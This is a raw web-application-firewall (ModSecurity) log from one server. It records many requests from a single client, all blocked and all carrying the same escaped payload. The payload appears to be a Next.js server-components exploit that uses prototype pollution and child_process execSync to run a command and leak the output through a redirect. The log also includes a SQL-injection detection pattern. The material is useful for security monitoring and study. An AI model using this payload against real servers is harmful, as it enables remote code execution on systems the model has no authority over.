{\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/auth/signin"] [unique_id "adJm1pc83uMXRUE9zvQTrQAAAdM"] [Sun Apr 05 15:42:46.971494 2026] [:error] [pid 23077:tid 23093] [client 172.94.9.253:38294] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/user"] [unique_id "adJm1pc83uMXRUE9zvQTrAAAAco"] [Sun Apr 05 15:42:47.004137 2026] [:error] [pid 13019:tid 13246] [client 172.94.9.253:38274] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/account"] [unique_id "adJm1rxQSOrq_iRTM7dq8AAAAQY"] [Sun Apr 05 15:42:47.020354 2026] [:error] [pid 13019:tid 13256] [client 172.94.9.253:38286] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/dashboard"] [unique_id "adJm1rxQSOrq_iRTM7dq7wAAARA"] [Sun Apr 05 15:42:47.032213 2026] [:error] [pid 23077:tid 23096] [client 172.94.9.253:38328] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/users"] [unique_id "adJm15c83uMXRUE9zvQTrwAAAc0"] [Sun Apr 05 15:42:47.043596 2026] [:error] [pid 1503:tid 1540] [client 172.94.9.253:38312] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/home"] [unique_id "adJm1kI7AjfUQYCN-J7D_QAAANg"] [Sun Apr 05 15:42:47.048194 2026] [:error] [pid 13019:tid 13259] [client 172.94.9.253:38316] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/blog"] [unique_id "adJm1rxQSOrq_iRTM7dq8QAAARM"] [Sun Apr 05 15:42:47.069817 2026] [:error] [pid 13019:tid 13244] [client 172.94.9.253:38304] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/profile"] [unique_id "adJm17xQSOrq_iRTM7dq8gAAAQQ"] [Sun Apr 05 15:42:47.071202 2026] [:error] [pid 31198:tid 31262] [client 172.94.9.253:38336] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/post"] [unique_id "adJm1zT5TgrBR8xRnfXBPQAAAUo"] [Sun Apr 05 15:42:47.103453 2026] [:error] [pid 13019:tid 13264] [client 172.94.9.253:38362] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/posts"] [unique_id "adJm17xQSOrq_iRTM7dq8wAAARg"] [Sun Apr 05 15:42:47.133662 2026] [:error] [pid 13019:tid 13257] [client 172.94.9.253:38368] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/home"] [unique_id "adJm17xQSOrq_iRTM7dq9AAAARE"] [Sun Apr 05 15:42:47.137618 2026] [:error] [pid 1503:tid 1518] [client 172.94.9.253:38350] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/search"] [unique_id "adJm10I7AjfUQYCN-J7EAAAAAMk"] [Sun Apr 05 15:42:47.144540 2026] [:error] [pid 13019:tid 13254] [client 172.94.9.253:38418] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/login"] [unique_id "adJm17xQSOrq_iRTM7dq-AAAAQ4"] [Sun Apr 05 15:42:47.166503 2026] [:error] [pid 13019:tid 13258] [client 172.94.9.253:38386] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/settings"] [unique_id "adJm17xQSOrq_iRTM7dq-QAAARI"] [Sun Apr 05 15:42:47.175151 2026] [:error] [pid 13019:tid 13262] [client 172.94.9.253:38382] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/auth"] [unique_id "adJm17xQSOrq_iRTM7dq9QAAARY"] [Sun Apr 05 15:42:47.201015 2026] [:error] [pid 13019:tid 13252] [client 172.94.9.253:38398] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/register"] [unique_id "adJm17xQSOrq_iRTM7dq9gAAAQw"] [Sun Apr 05 15:42:47.214392 2026] [:error] [pid 13019:tid 13255] [client 172.94.9.253:38396] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/product"] [unique_id "adJm17xQSOrq_iRTM7dq-gAAAQ8"] [Sun Apr 05 15:42:47.232302 2026] [:error] [pid 13019:tid 13247] [client 172.94.9.253:38408] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/auth/session"] [unique_id "adJm17xQSOrq_iRTM7dq9wAAAQc"] [Sun Apr 05 15:42:47.236077 2026] [:error] [pid 23077:tid 23103] [client 172.94.9.253:38394] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/de"] [unique_id "adJm15c83uMXRUE9zvQTsAAAAdQ"] [Sun Apr 05 15:42:47.271386 2026] [:error] [pid 31198:tid 31256] [client 172.94.9.253:38436] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: 